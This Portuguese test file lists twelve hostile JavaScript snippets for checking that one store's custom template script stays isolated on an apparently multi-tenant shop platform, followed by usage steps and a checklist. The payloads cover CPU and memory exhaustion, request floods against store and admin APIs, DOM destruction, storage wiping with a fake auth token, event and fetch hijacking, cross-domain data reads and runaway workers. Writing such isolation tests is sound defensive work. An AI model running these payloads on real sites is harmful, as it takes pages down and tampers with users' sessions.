═══════════════════════════════════════════════════════════════════════════════
⚠️  CÓDIGOS JAVASCRIPT MALICIOSOS PARA TESTES DE SEGURANÇA
═══════════════════════════════════════════════════════════════════════════════

ATENÇÃO: Use apenas em ambiente de teste para verificar o isolamento!

═══════════════════════════════════════════════════════════════════════════════
TESTE 1: LOOP INFINITO (CPU 100%)
═══════════════════════════════════════════════════════════════════════════════

while(true) {
  console.log('Loop infinito ativo');
}

═══════════════════════════════════════════════════════════════════════════════
TESTE 2: CONSUMO EXCESSIVO DE MEMÓRIA
═══════════════════════════════════════════════════════════════════════════════

const memoryKiller = [];
for(let i = 0; i < 10000000; i++) {
  memoryKiller.push(new Array(1000).fill('X'));
  if(i % 100000 === 0) {
    console.log('Consumindo memória...', i);
  }
}

═══════════════════════════════════════════════════════════════════════════════
TESTE 3: MANIPULAÇÃO DO DOM GLOBAL
═══════════════════════════════════════════════════════════════════════════════

const allElements = document.querySelectorAll('*');
allElements.forEach((el, index) => {
  el.style.backgroundColor = 'red';
  el.style.color = 'white';
  if(index % 100 === 0) {
    console.log('Modificando elemento', index);
  }
});

const criticalElements = document.querySelectorAll('header, footer, nav, main');
criticalElements.forEach(el => {
  el.remove();
  console.log('Elemento removido:', el.tagName);
});

═══════════════════════════════════════════════════════════════════════════════
TESTE 4: SOBRECARGA DE REQUISIÇÕES
═══════════════════════════════════════════════════════════════════════════════

let requestCount = 0;
function spamRequests() {
  fetch('/api/public/store')
    .then(() => {
      requestCount++;
      console.log('Requisição', requestCount);
      spamRequests();
    })
    .catch(() => {
      spamRequests();
    });
}

spamRequests();

setInterval(() => {
  fetch('/api/stores').catch(() => {});
  fetch('/api/admin/stores').catch(() => {});
  fetch('/').catch(() => {});
}, 10);

═══════════════════════════════════════════════════════════════════════════════
TESTE 5: MODIFICAÇÃO DE STORAGE
═══════════════════════════════════════════════════════════════════════════════

try {
  localStorage.clear();
  sessionStorage.clear();
  localStorage.setItem('auth_token', 'HACKED');
  localStorage.setItem('user', JSON.stringify({hacked: true}));
  sessionStorage.setItem('cart', '[]');
  console.log('Storage modificado!');
} catch(e) {
  console.error('Erro:', e);
}

═══════════════════════════════════════════════════════════════════════════════
TESTE 6: INTERCEPTAÇÃO DE EVENTOS GLOBAIS
═══════════════════════════════════════════════════════════════════════════════

const originalAddEventListener = EventTarget.prototype.addEventListener;
EventTarget.prototype.addEventListener = function(type, listener, options) {
  console.log('Evento interceptado:', type);
  return originalAddEventListener.call(this, type, listener, options);
};

document.addEventListener('click', function(e) {
  console.log('Click interceptado em:', e.target);
  e.preventDefault();
  e.stopPropagation();
}, true);

document.addEventListener('submit', function(e) {
  console.log('Form interceptado!');
  e.preventDefault();
  e.stopPropagation();
}, true);

═══════════════════════════════════════════════════════════════════════════════
TESTE 7: MODIFICAÇÃO DE WINDOW/DOCUMENT GLOBAL
═══════════════════════════════════════════════════════════════════════════════

window.alert = function() {
  console.log('Alert interceptado!');
};

window.confirm = function() {
  console.log('Confirm interceptado!');
  return true;
};

window.fetch = function() {
  console.log('Fetch interceptado!');
  return Promise.reject('Fetch bloqueado');
};

document.write = function() {
  console.log('document.write interceptado!');
};

console.log = function() {
  // Silenciar todos os logs
};

const OriginalXHR = window.XMLHttpRequest;
window.XMLHttpRequest = function() {
  console.log('XMLHttpRequest interceptado!');
  return new OriginalXHR();
};

═══════════════════════════════════════════════════════════════════════════════
TESTE 8: CRIAÇÃO MASSIVA DE ELEMENTOS DOM
═══════════════════════════════════════════════════════════════════════════════

for(let i = 0; i < 100000; i++) {
  const div = document.createElement('div');
  div.innerHTML = 'Elemento ' + i;
  div.style.position = 'absolute';
  div.style.left = (i % 1000) + 'px';
  div.style.top = Math.floor(i / 1000) + 'px';
  document.body.appendChild(div);

  if(i % 1000 === 0) {
    console.log('Criados', i, 'elementos');
  }
}

═══════════════════════════════════════════════════════════════════════════════
TESTE 9: TENTATIVA DE ACESSAR OUTROS DOMÍNIOS
═══════════════════════════════════════════════════════════════════════════════

const domains = [
  'https://outraloja.nerix.online',
  'https://nerix.com.br',
  'https://nerix.com.br/store',
  'https://nerix.com.br/admin',
  'http://localhost:3000/api/stores',
  'http://localhost:3000/api/admin/stores'
];

domains.forEach(domain => {
  fetch(domain)
    .then(res => {
      console.log('Conseguiu acessar:', domain);
      return res.text();
    })
    .then(data => {
      console.log('Dados recebidos de', domain, ':', data.substring(0, 100));
    })
    .catch(err => {
      console.log('Erro ao acessar', domain, ':', err.message);
    });
});

═══════════════════════════════════════════════════════════════════════════════
TESTE 10: LOOP COM SETTIMEOUT (CPU GRADUAL)
═══════════════════════════════════════════════════════════════════════════════

let count = 0;
function recursiveLoop() {
  count++;
  console.log('Loop', count);

  const div = document.createElement('div');
  div.textContent = 'Loop ' + count;
  document.body.appendChild(div);

  setTimeout(recursiveLoop, 0);
}

recursiveLoop();

═══════════════════════════════════════════════════════════════════════════════
TESTE 11: TENTATIVA DE MODIFICAR REACT/ESTADO GLOBAL
═══════════════════════════════════════════════════════════════════════════════

if (window.__REACT_DEVTOOLS_GLOBAL_HOOK__) {
  console.log('React DevTools encontrado!');
  const hook = window.__REACT_DEVTOOLS_GLOBAL_HOOK__;
  console.log('Hook:', hook);
}

if (window.React) {
  console.log('React encontrado!', window.React);
}

if (window.__ZUSTAND_STORES__) {
  console.log('Zustand stores encontrados!');
}

window.hacked = true;
window.storeHacked = true;

═══════════════════════════════════════════════════════════════════════════════
TESTE 12: WEB WORKERS MALICIOSOS
═══════════════════════════════════════════════════════════════════════════════

const workerCode = `
  while(true) {
    postMessage('Worker ativo');
  }
`;

const blob = new Blob([workerCode], { type: 'application/javascript' });
const workerUrl = URL.createObjectURL(blob);

for(let i = 0; i < 10; i++) {
  const worker = new Worker(workerUrl);
  worker.onmessage = (e) => {
    console.log('Worker', i, ':', e.data);
  };
}

═══════════════════════════════════════════════════════════════════════════════
COMO USAR:
═══════════════════════════════════════════════════════════════════════════════

1. Criar uma loja de teste no dashboard
2. Ir em Configurações > Templates > Editar um template
3. Colar um dos códigos acima no campo JavaScript
4. Salvar e ativar o template
5. Abrir a loja em uma aba
6. Abrir o dashboard em outra aba
7. Abrir outra loja em outra aba
8. Abrir a landing page em outra aba
9. Verificar se apenas a loja com o código foi afetada

═══════════════════════════════════════════════════════════════════════════════
CHECKLIST DE SEGURANÇA:
═══════════════════════════════════════════════════════════════════════════════

[ ] A loja com código malicioso foi afetada
[ ] O dashboard (/store) continua funcionando normalmente
[ ] O admin (/admin) continua funcionando normalmente
[ ] A landing page (/) continua funcionando normalmente
[ ] Outras lojas continuam funcionando normalmente
[ ] O servidor não foi derrubado (pode ficar lento, mas não deve cair)
[ ] Logs de erro aparecem no console apenas da loja afetada

═══════════════════════════════════════════════════════════════════════════════

